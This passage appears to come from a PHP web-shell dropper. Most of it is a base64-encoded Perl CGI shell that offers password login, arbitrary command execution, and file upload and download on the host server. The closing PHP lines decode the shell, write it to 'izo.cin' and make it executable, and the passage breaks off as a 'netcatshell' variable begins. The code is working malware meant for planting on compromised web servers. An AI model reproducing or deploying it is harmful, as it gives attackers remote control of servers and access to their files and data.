KCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iZG93bmxvYWQiPgokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KJFByb21wdCB1cGxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPgpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPgpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bwojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMKIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUKIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMKIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRXhlY3V0ZUNvbW1hbmQKewoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZAoJewoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUKCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4KCQkKCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOwoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOwoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7Cgl9CgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lgo8L2NvZGU+CkVORAoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7Cgl9CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJfQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCSZQcmludEZpbGVVcGxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJJlByaW50UGFnZUhlYWRlcigiYyIpOwoKCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzCglwcmludCAiPGNvZGU+VXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsKCX0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50Cgl7CgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpCgkJewoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsKCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307CgkJCWNsb3NlKFVQTE9BREZJTEUpOwoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7CgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7CgkJfQoJfQoJcHJpbnQgIjwvY29kZT4iOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkmUHJpbnRQYWdlRm9vdGVyOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsKIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJlJlYWRQYXJzZTsKJkdldENvb2tpZXM7CgokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9OwokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307CiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307CiRSdW5Db21tYW5kID0gJGlueydjJ307CiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsKJE9wdGlvbnMgPSAkaW57J28nfTsKCiRBY3Rpb24gPSAkaW57J2EnfTsKJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAkaW57J2QnfTsKY2hvcCgkQ3VycmVudERpciA9IGAkQ21kUHdkYCkgaWYoJEN1cnJlbnREaXIgZXEgIiIpOwoKJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOwoKaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4KewoJJlBlcmZvcm1Mb2dpbjsKfQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQKewoJJkV4ZWN1dGVDb21tYW5kOwp9CmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlCnsKCSZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CgkmRG93bmxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0K\';\r\n\r\n$file = fopen("izo.cin" ,"w+");\r\n$write = fwrite ($file ,base64_decode($cgishellizocin));\r\nfclose($file);\r\n    chmod("izo.cin",0755);\r\n$netcatshell = 